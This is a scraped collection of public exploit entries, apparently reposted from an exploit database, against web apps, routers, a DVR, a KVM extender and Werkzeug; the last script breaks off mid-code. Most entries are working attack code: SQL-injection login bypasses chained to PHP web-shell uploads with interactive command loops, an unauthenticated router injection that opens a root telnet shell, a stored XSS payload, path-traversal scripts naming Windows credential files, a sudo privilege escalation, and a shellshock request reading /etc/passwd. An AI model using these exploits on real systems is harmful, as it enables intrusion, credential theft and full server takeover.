# Exploit Title: Simple Client Management System 1.0 - Remote Code Execution (RCE) # Date: July 4, 2021 # Exploit Author: Ishan Saha # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/client-details.zip # Version: 1.0 # Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3 & Ubuntu & Kali #!/usr/bin/python # Description: # 1. This uses the SQL injection to bypass the admin login and create a new user # 2. The new user makes a client with the shell payload and uploads the generic shellcode into the server # 3. the shell is called from the location import requests from colorama import Fore, Back, Style ''' Description: Using the sql injeciton to bypass the login and create a user. This user creates a client with the shell as an image and uploads the shell. The shell is called by the requests library for easier use. ------------------------------------------ Developed by - Ishan Saha & HackerCTF team (https://twitter.com/hackerctf) ------------------------------------------ ''' # Variables : change the URL according to need URL="http://192.168.0.248/client/" shellcode = "<?php system($_GET['cmd']);?>" filename = "shell.php" authdata={"username":"admin' or '1'='1","password":"admin' or '1'='1","login":"Submit Query"} createuser = {"fname":"ishan","lname":"saha","email":"research@hackerctf.com","password":"Grow_with_hackerctf","contact":"1234567890","signup":"Sign Up"} userlogin={"uemail":"research@hackerctf.com","password":"Grow_with_hackerctf","login":"LOG IN"} shelldata={"fname":"a","lname":"l","uname":"l","email":"l@l.l","phone":"1234567890","plan":"k","pprice":"k","proofno":"l","caddress":"ll","haddress":"ll","rdate":"9/9/09","bdate":"9/9/09","depatment":"l","csubmit":"Submit"} def format_text(title,item): cr = '\r\n' section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr item=str(item) text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+ Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET return text ShellSession = requests.Session() response = ShellSession.get(URL) response = ShellSession.post(URL + "admin/index.php",data=authdata) response = ShellSession.post(URL + "admin/regester.php",data=createuser) response = ShellSession.post(URL,data=userlogin) response = ShellSession.post(URL + "create.php",data=shelldata,files={"uimg":(filename,shellcode,"application/php"),"proof1":(filename,shellcode,"application/php"),"proof2":(filename,shellcode,"application/php")}) location = URL +"img/" + filename #print statements print(format_text("Target",URL),end='') print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='') print(format_text("shell location",location),end='') print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!")) while True: cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET) if cmd == 'exit': break print(ShellSession.get(location + "?cmd="+cmd).content.decode())
HireHackking
# Exploit Title: Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated) # Date: 02.07.2021 # Exploit Author: SivertPL # Vendor Homepage: https://www.netgear.com/ # Version: All prior to v1.0.0.60 #!/usr/bin/python """ NETGEAR DGN2200v1 Unauthenticated Remote Command Execution Author: SivertPL (kroppoloe@protonmail.ch) Date: 02.07.2021 Status: Patched in some models Version: All prior to v1.0.0.60 Impact: Critical CVE: No CVE number assigned PSV: PSV-2020-0363, PSV-2020-0364, PSV-2020-0365 References: 1) https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/ 2) https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1 The exploit script only works on UNIX-based systems. This ancient vulnerability works on other models utilizing Bezeq firmware, so not just DGN2200v1 is vulnerable. It is estimated that around 7-10 other models might be or might have been vulnerable in the past. This is a very old exploit, dating back to 2017, so forgive me for Python2.7 lol. """ import sys import requests import os target_ip = "192.168.0.1" telnet_port = 666 sent = False def main(): if len(sys.argv) < 3: print "./dgn2200_pwn.py <router ip> <backdoor-port>" exit() target_ip = sys.argv[1] telnet_port = int(sys.argv[2]) print "[+] Sending the payload to " + target_ip + " and opening the backdoor ..." send_payload() print "[+] Trying to connect to the backdoor for " + str(telnet_port) + " ..." print "[!] If it fails to connect it means the target is probably not vulnerable" spawn_shell() def send_payload(): try: requests.get("http://" + target_ip + "/dnslookup.cgi?host_name=www.google.com; /usr/sbin/telnetd -p " + str(telnet_port) + " -l /bin/sh" + str(telnet_port) + "&lookup=Lookup&ess_=true") sent = True except Exception: sent = False print "[-] Unknown error, target might not be vulnerable." def spawn_shell(): if sent: print "[+] Dropping a shell..." os.system("telnet " + target_ip + " " + telnet_port) else: exit() if __name__ == "__main__": main()
HireHackking

perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS)

HACKER · %s · %s

# Exploit Title: perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS) # Date: 05/07/2021 # Exploit Author: Alhasan Abbas (exploit.msf) # Vendor Homepage: https://www.perfexcrm.com/ # Version: 1.10 # Tested on: windows 10 Vunlerable page: /clients/profile POC: ---- POST /clients/profile HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------325278703021926100783634528058 Content-Length: 1548 Origin: http://localhost Connection: close Referer: http://localhost/clients/profile Cookie: sp_session=07c611b7b8d391d144a06b39fe55fb91b744a038 Upgrade-Insecure-Requests: 1 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="profile" 1 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="profile_image"; filename="" Content-Type: application/octet-stream -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="firstname" adfgsg -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="lastname" fsdgfdg -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="company" test -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="vat" 1 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="phonenumber" -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="country" 105 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="city" asdf -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="address" asdf -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="zip" 313 -----------------------------325278703021926100783634528058 Content-Disposition: form-data; name="state" ""><body onload=alert("XSS")>"> -----------------------------325278703021926100783634528058-- then any one open profile page in user the xss its executed
HireHackking
# Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated) # Date: 06/07/2021 # Exploit Author: Thamer Almohammadi (@Thamerz88) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html # Version: 1.0 # Tested on: Kali Linux # Proof of Concept : 1- Send Request to /pages/save_user.php. 2- Find your shell.php file path and try any command. ################################## REQUEST ############################### POST /pages/save_user.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877 Content-Length: 369 -----------------------------3767690350396265302394702877 Content-Disposition: form-data; name="image"; filename="shell.php" Content-Type: application/x-php <?php system($_GET['cmd']); ?> -----------------------------3767690350396265302394702877 Content-Disposition: form-data; name="btn_save" -----------------------------3767690350396265302394702877-- ################################## RESPONSE ############################# HTTP/1.1 200 OK Date: Tue, 06 Jul 2021 02:16:18 GMT Server: Apache/2.4.47 (Unix) OpenSSL/1.1.1k PHP/7.3.28 mod_perl/2.0.11 Perl/v5.32.1 X-Powered-By: PHP/7.3.28 Content-Length: 1529 Connection: close Content-Type: text/html; charset=UTF-8 ################################## Exploit ############################# <?php // Coder By Thamer Almohammadi(@Thamerz88); function exploit($scheme,$host,$path,$shell){ $url=$scheme."://".$host.$path; $content='<form enctype="multipart/form-data" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="512000" />File To Upload : <input name="userfile" type="file" /><input type="submit" value="Upload"/></form><?php $uploaddir = getcwd ()."/";$uploadfile = $uploaddir . basename ($_FILES[\'userfile\'][\'name\']);if (move_uploaded_file ($_FILES[\'userfile\'][\'tmp_name\'], $uploadfile)){echo "File was successfully uploaded.</br>";}else{echo "Upload failed";}?>'; $data = "-----------------------------3767690350396265302394702877\r\n"; $data .= "Content-Disposition: form-data; name=\"image\"; filename=\"$shell\"\r\n"; $data .= "Content-Type: image/gif\r\n\r\n"; $data .= "$content\r\n"; $data .= "-----------------------------3767690350396265302394702877\r\n"; $data .= "-----------------------------3767690350396265302394702877\r\n"; $data .= "Content-Disposition: form-data; name=\"btn_save\"\r\n\r\n"; $data .= "\r\n"; $data .= "-----------------------------3767690350396265302394702877\r\n"; $packet = "POST $path/pages/save_user.php HTTP/1.0\r\n"; $packet .= "Host: $host\r\n"; $packet .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0\r\n"; $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*\/*;q=0.8\r\n"; $packet .= "Accept-Language: en-us,en;q=0.5\r\n"; $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877\r\n"; $packet .= "Content-Length: ".strlen ($data)."\r\n\r\n\r\n"; $packet .= $data; $packet .= "\r\n"; send($host, $packet); sleep(2); check($url,$shell); } function send($host, $packet) { if ($connect = @fsockopen ($host, 80, $x, $y, 3)) { @fputs ($connect, $packet); @fclose ($connect); } } function check($url,$shell){ $check=file_get_contents($url."/uploadImage/Profile/".$shell); $preg=preg_match('/(File To Upload)/', $check, $output); if($output[0] == "File To Upload"){ echo "[+] Upload shell successfully.. :D\n"; echo "[+] Link ". $url."/uploadImage/Profile/".$shell."\n"; } else{ //Exploit Failed echo "[-] Exploit Failed..\n"; } } $options=getopt("u:s:"); if(!isset($options['u'], $options['s'])) die("\n [+] Simple Exploiter Exam Hall Management System by T3ster \n [+] Usage : php exploit.php -u http://target.com -s shell.php\n -u http://target.com = Target URL .. -s shell.php = Shell Name ..\n\n"); $url=$options["u"]; $shell=$options["s"]; $parse=parse_url($url); $host=$parse['host']; $path=$parse['path']; $scheme=$parse['scheme']; exploit($scheme,$host,$path,$shell); ?>
HireHackking

Pallets Werkzeug 0.15.4 - Path Traversal

HACKER · %s · %s

# Exploit Title: Pallets Werkzeug 0.15.4 - Path Traversal # Date: 06 July 2021 # Original Author: Emre ÖVÜNÇ # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://palletsprojects.com/ # Software Link: https://github.com/pallets/werkzeug # Version: Prior to 0.15.5 # Tested on: Windows Server # CVE: 2019-14322 # Credit: Emre Övünç and Olivier Dony for responsibly reporting the issue # CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2019-14322 # Reference : https://palletsprojects.com/blog/werkzeug-0-15-5-released/ Description : Prior to 0.15.5, it was possible for a third party to potentially access arbitrary files when the application used SharedDataMiddleware on Windows. Due to the way Python's os.path.join() function works on Windows, a path segment with a drive name will change the drive of the final path. TLDR; In Pallets Werkzeug before 0.15.5, SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames lead to arbitrary file download. #!/usr/bin/env python3 # PoC code by @faisalfs10x [https://github.com/faisalfs10x] """ $ pip3 install colorama==0.3.3, argparse, requests, urllib3 $ python3 CVE-2019-14322.py -l list_target.txt" """ import argparse import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) import requests from colorama import Fore, Back, Style, init # Colors red = '\033[91m' green = '\033[92m' white = '\033[97m' yellow = '\033[93m' bold = '\033[1m' end = '\033[0m' init(autoreset=True) def banner_motd(): print(Fore.CYAN +Style.BRIGHT +""" CVE-2019-14322 %sPoC by faisalfs10x%s - (%s-%s)%s %s """ % (bold, red, white, yellow, white, end)) banner_motd() # list of sensitive files to grab in windows # %windir%\repair\sam # %windir%\System32\config\RegBack\SAM # %windir%\repair\system # %windir%\repair\software # %windir%\repair\security # %windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account) # %windir%\iis6.log (5,6 or 7) # %windir%\system32\logfiles\httperr\httperr1.log # C:\sysprep.inf # C:\sysprep\sysprep.inf # C:\sysprep\sysprep.xml # %windir%\Panther\Unattended.xml # C:\inetpub\wwwroot\Web.config # %windir%\system32\config\AppEvent.Evt (Application log) # %windir%\system32\config\SecEvent.Evt (Security log) # %windir%\system32\config\default.sav # %windir%\system32\config\security.sav # %windir%\system32\config\software.sav # %windir%\system32\config\system.sav # %windir%\system32\inetsrv\config\applicationHost.config # %windir%\system32\inetsrv\config\schema\ASPNET_schema.xml # %windir%\System32\drivers\etc\hosts (dns entries) # %windir%\System32\drivers\etc\networks (network settings) # %windir%\system32\config\SAM # TLDR: # C:/windows/system32/inetsrv/config/schema/ASPNET_schema.xml # C:/windows/system32/inetsrv/config/applicationHost.config # C:/windows/system32/logfiles/httperr/httperr1.log # C:/windows/debug/NetSetup.log - (may contain AD domain name, DC name, internal IP, DA account) # C:/windows/system32/drivers/etc/hosts - (dns entries) # C:/windows/system32/drivers/etc/networks - (network settings) def check(url): # There are 3 endpoints to be tested by default, but to avoid noisy, just pick one :) for endpoint in [ 'https://{}/base_import/static/c:/windows/win.ini', #'https://{}/web/static/c:/windows/win.ini', #'https://{}/base/static/c:/windows/win.ini' ]: try: url2 = endpoint.format(url) resp = requests.get(url2, verify=False, timeout=5) if 'fonts' and 'files' and 'extensions' in resp.text: print(Fore.LIGHTGREEN_EX +Style.BRIGHT +" [+] " +url2+ " : vulnerable====[+]") with open('CVE-2019-14322_result.txt', 'a+') as output: output.write('{}\n'.format(url2)) output.close() else: print(" [-] " +url+ " : not vulnerable") except KeyboardInterrupt: exit('User aborted!') except: print(" [-] " +url+ " : not vulnerable") def main(args): f = open(listfile, "r") for w in f: url = w.strip() check(url) if __name__ == '__main__': try: parser = argparse.ArgumentParser(description='CVE-2019-14322') parser.add_argument("-l","--targetlist",required=True, help = "target list in file") args = parser.parse_args() listfile = args.targetlist main(args) except KeyboardInterrupt: exit('User aborted!')
HireHackking

Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation

HACKER · %s · %s

# Exploit Title: Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation # Date: 2021-07-05 # Exploit Author: Andrea D'Ubaldo # Vendor Homepage: https://visual-tools.com/ # Version: Visual Tools VX16 v4.2.28.0 # Tested on: VX16 Embedded Linux 2.6.35.4. #An attacker can perform a system-level (root) local privilege escalation abusing unsafe Sudo configuration. sudo mount -o bind /bin/sh /bin/mount sudo mount
HireHackking
# Exploit Title: WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal # Date: 05.07.2021 # Exploit Author: TheSmuggler # Vendor Homepage: https://gotmls.net/ # Software Link: https://gotmls.net/downloads/ # Version: <= 4.20.72 # Tested on: Windows import requests print(requests.get("http://127.0.0.1/wp-admin/admin-ajax.php?action=duplicator_download&file=..\..\..\..\..\..\..\..\..\Windows\win.ini", headers={"User-Agent":"Chrome"}).text)
HireHackking

Phone Shop Sales Managements System 1.0 - Arbitrary File Upload

HACKER · %s · %s

# Exploit Title: Phone Shop Sales Managements System 1.0 - 'Multiple' Arbitrary File Upload to Remote Code Execution # Date: 2021-07-06 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html # Version: 1.0 # Tested on: Windows 10, XAMPP ########### # PoC 1: # ########### Request: ======== POST /osms/Execute/ExAddProduct.php HTTP/1.1 Host: localhost Content-Length: 2160 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBZWMUliFtu0otJ0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/osms/AddNewProduct.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=6i2a5u327llvco5kgglbalhdn0 Connection: close ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ProductName" camera ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="BrandName" soskod ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ProductPrice" 12 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Quantity" 1 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="TotalPrice" 12 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="DisplaySize" 15 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="OperatingSystem" windows ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Processor" 4 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="InternalMemory" 4 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="RAM" 4 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="CameraDescription" lens ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="BatteryLife" 3300 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Weight" 500 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Model" AIG34 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Dimension" 5 inch ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ASIN" 9867638 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="ProductImage"; filename="rev.php" Content-Type: application/octet-stream <?php echo "result: ";system($_GET['rev']); ?> ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="date2" 2020-06-03 ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="Description" accept ------WebKitFormBoundaryIBZWMUliFtu0otJ0 Content-Disposition: form-data; name="_wysihtml5_mode" 1 ------WebKitFormBoundaryIBZWMUliFtu0otJ0-- ########### # PoC 2: # ########### Request: ======== POST /osms/Execute/ExChangePicture.php HTTP/1.1 Host: localhost Content-Length: 463 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://localhost Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4Dm8cGBqGNansHqI User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://localhost/osms/UserProfile.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=4nksm1jl45bfbbd5ovn0fpi594 Connection: close ------WebKitFormBoundary4Dm8cGBqGNansHqI Content-Disposition: form-data; name="IDUser" 6 ------WebKitFormBoundary4Dm8cGBqGNansHqI Content-Disposition: form-data; name="Image"; filename="rev.php" Content-Type: application/octet-stream <?php echo "output: ";system($_GET['rev']); ?> ------WebKitFormBoundary4Dm8cGBqGNansHqI-- ########### # Access: # ########### # Webshell access via: PoC 1: http://localhost/osms/assets/img/Product_Uploaded/rev.php?rev=whoami PoC 2: http://localhost/osms/assets/img/Profile_Uploaded/rev.php?rev=whoami # Output: result: windows10\user
HireHackking
# Exploit Title: Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection # Date: 2021-07-07 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scheduler.zip # Version: 1.0 # Tested on: Windows 10, XAMPP ################ # Description # ################ The admin panel login can be assessed at http://{ip}/scheduler/admin/login.php. The username parameter is vulnerable to time-based SQL injection. Upon successful dumping the admin password hash, we can decrypt and obtain the plain-text password. Hence, we could authenticate as Administrator. ########### # PoC # ########### Run sqlmap to dump username and password: $ sqlmap -u "http://localhost/scheduler/classes/Login.php?f=login" --data="username=admin&password=blabla" --cookie="PHPSESSID=n3to3djqetf42c2e7l257kspi5" --batch --answers="crack=N,dict=N,continue=Y,quit=N" -D scheduler -T users -C username,password --dump ########### # Output # ########### Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=admin' AND (SELECT 7551 FROM (SELECT(SLEEP(5)))QOUn) AND 'MOUZ'='MOUZ&password=blabla Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) web server operating system: Windows web application technology: PHP 5.6.24, Apache 2.4.23 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) current database: 'scheduler' Database: scheduler Table: users [1 entry] +----------+----------------------------------+ | username | password | +----------+----------------------------------+ | admin | 0192023a7bbd73250516f069df18b500 | +----------+----------------------------------+ The password is based on PHP md5() function. So, MD5 reverse for 0192023a7bbd73250516f069df18b500 is admin123
HireHackking
# Exploit Title: Church Management System 1.0 - 'password' SQL Injection (Authentication Bypass) # Date: 07/03/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html # Version: 1.0 # Tested on: Windows 10 # Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication. # Proof of Concept : 1-Go to http://target.com/cman/admin 2-Write the following payload to username and admin parameter and click login. ######################## REQUEST ############################### POST /cman/admin/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 51 Origin: http://localhost Connection: close Referer: http://localhost/cman/admin/index.php Cookie: PHPSESSID=cne5l4cs93krjqobput7nv7sjc Upgrade-Insecure-Requests: 1 username=test&password=%27+or+%27a%27%3D%27a&login= ################################################################ PAYLOAD: # username : test # password : ' or 'a'='a
HireHackking
# Exploit Title: TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated) # Date: 07/04/2021 # Exploit Author: Mevlüt Akçam # Software Link: https://github.com/textpattern/textpattern # Vendor Homepage: https://textpattern.com/ # Version: 4.9.0-dev # Tested on: 20.04.1-Ubuntu #!/usr/bin/python3 import requests from bs4 import BeautifulSoup as bs4 import json import string import random import argparse # Colors RED="\033[91m" GREEN="\033[92m" RESET="\033[0m" parser = argparse.ArgumentParser() parser.add_argument('-t', '--url', required=True, action='store', help='Target url') parser.add_argument('-u', '--user', required=True, action='store', help='Username') parser.add_argument('-p', '--password', required=True, action='store', help='Password') args = parser.parse_args() URL=args.url uname=args.user passwd=args.password session=requests.Session() def login(uname,passwd): data={'lang':'en','p_userid':uname,'p_password':passwd} r_login=session.post(URL+"/textpattern/index.php",data=data, verify=False) if r_login.status_code == 200: print(GREEN,f"[+] Login successful , your cookie : {session.cookies['txp_login']}",RESET) else: print(RED,f"[-] Login failed",RESET) exit() def get_token(): print(GREEN,f"[+] Getting token ",RESET) r_token=session.get(URL+"/textpattern/index.php?event=plugin") soup = bs4(r_token.text, 'html.parser') textpattern = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-1] textpattern = json.loads(textpattern) return textpattern['_txp_token'] def upload(): file_name=''.join(random.choice(string.ascii_lowercase) for _ in range(10)) file={ 'theplugin':( file_name+".php", """ <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" autofocus> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])){system($_GET['cmd']);} ?> </pre> </body> </html> <!-- """+file_name+" -->" ),# The file_name is used to verify that the file has been uploaded. 'install_new':(None,'Upload'), 'event':(None,'plugin'), 'step':(None,'plugin_upload'), '_txp_token':(None,get_token()), } r_upload=session.post(URL+"/textpattern/index.php",verify=False,files=file) if file_name in r_upload.text: print(GREEN,f"[+] Shell uploaded",RESET) print(GREEN,f"[+] Webshell url : {URL}/textpattern/tmp/{file_name}.php",RESET) else: print(RED,f"[-] Shell failed to load",RESET) print(RED,f"[-] Bye",RESET) exit() if __name__=="__main__": login(uname,passwd) upload() print(GREEN,f"[+] Bye",RESET)
HireHackking
# Exploit Title: Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE) # Date: 02.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.riconmobile.com #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # Ricon Industrial Cellular Router S9922XL Remote Command Execution # # # Vendor: Ricon Mobile Inc. # Product web page: https://www.riconmobile.com # Affected version: Model: S9922XL and S9922L # Firmware: 16.10.3 # # Summary: S9922L series LTE router is designed and manufactured by # Ricon Mobile Inc., it based on 3G/LTE cellular network technology # with industrial class quality. With its embedded cellular module, # it widely used in multiple case like ATM connection, remote office # security connection, data collection, etc. # # The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi # and VPN technologies. Powerful 64-bit Processor and integrated real-time # operating system specially developed by Ricon Mobile. S9922XL is # widely used in many areas such as intelligent transportation, scada, # POS, industrial automation, telemetry, finance, environmental protection. # # Desc: The router suffers from an authenticated OS command injection # vulnerability. This can be exploited to inject and execute arbitrary # shell commands as the admin (root) user via the 'ping_server_ip' POST # parameter. Also vulnerable to Heartbleed. # # -------------------------------------------------------------------- # C:\>python ricon.py 192.168.1.71 id # uid=0(admin) gid=0(admin) # -------------------------------------------------------------------- # # Tested on: GNU/Linux 2.6.36 (mips) # WEB-ROUTER # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2021-5653 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php # # # 02.07.2021 # import requests,sys,re if len(sys.argv)<3: print("Ricon Industrial Routers RCE") print("Usage: ./ricon.py [ip] [cmd]") sys.exit(17) else: ipaddr=sys.argv[1] execmd=sys.argv[2] data={'submit_class' :'admin', 'submit_button' :'netTest', 'submit_type' :'', 'action' :'Apply', 'change_action' :'', 'is_ping' :'0', 'ping_server_ip':';'+execmd} htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin')) htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin')) reout=re.search("20\">(.*)</textarea>",htreq.text,flags=re.S).group(1).strip('\n') print(reout)
HireHackking
# Exploit Title: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated) # Date: 2021-07-05 # Exploit Author: Andrea D'Ubaldo # Vendor Homepage: https://visual-tools.com/ # Version: Visual Tools VX16 v4.2.28.0 # Tested on: VX16 Embedded Linux 2.6.35.4. # CVE: CVE-2021-42071 # Reference: https://www.swascan.com/security-advisory-visual-tools-dvr-cve-2021-42071/ # An unauthenticated remote attacker can inject arbitrary commands to CGI script that can result in remote command execution. curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http:/DVR_ADDR/cgi-bin/slogin/login.py
HireHackking

Black Box Kvm Extender 3.4.31307 - Local File Inclusion

HACKER · %s · %s

# Exploit Title: Black Box Kvm Extender 3.4.31307 - Local File Inclusion # Date: 05.07.2021 # Exploit Author: Ferhat Çil # Vendor Homepage: http://www.blackbox.com/ # Software Link: https://www.blackbox.com/en-us/products/black-box-brand-products/kvm # Version: 3.4.31307 # Category: Webapps # Tested on: Linux # Description: Any user can read files from the server # without authentication due to an existing LFI in the following path: # http://target//cgi-bin/show?page=FilePath import requests import sys if name == 'main': if len(sys.argv) == 3: url = sys.argv[1] payload = url + "/cgi-bin/show?page=../../../../../../" + sys.argv[2] r = requests.get(payload) print(r.text) else: print("Usage: " + sys.argv[0] + ' http://example.com/ /etc/passwd')
HireHackking
# Exploit Title: Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated) # Date: 06.07.2021 # Exploit Author: Talha DEMİRSOY # Software Link: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html # Version: V 1.0 # Tested on: Linux & Windows import requests import random import string from bs4 import BeautifulSoup let = string.ascii_lowercase shellname = ''.join(random.choice(let) for i in range(15)) randstr = ''.join(random.choice(let) for i in range(15)) payload= "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd = ($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>" url = input("Target : ") session = requests.session() reqUrl = url + "login.php" reqHead = {"Content-Type": "application/x-www-form-urlencoded"} reqData = {"username": "admin' or '1'='1'#", "password": "-", "login": ''} session.post(reqUrl, headers=reqHead, data=reqData) print("Shell Uploading...") reqUrl = url + "php_action/createProduct.php" reqHead = {"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryOGdnGszwuETwo6WB"} reqData = 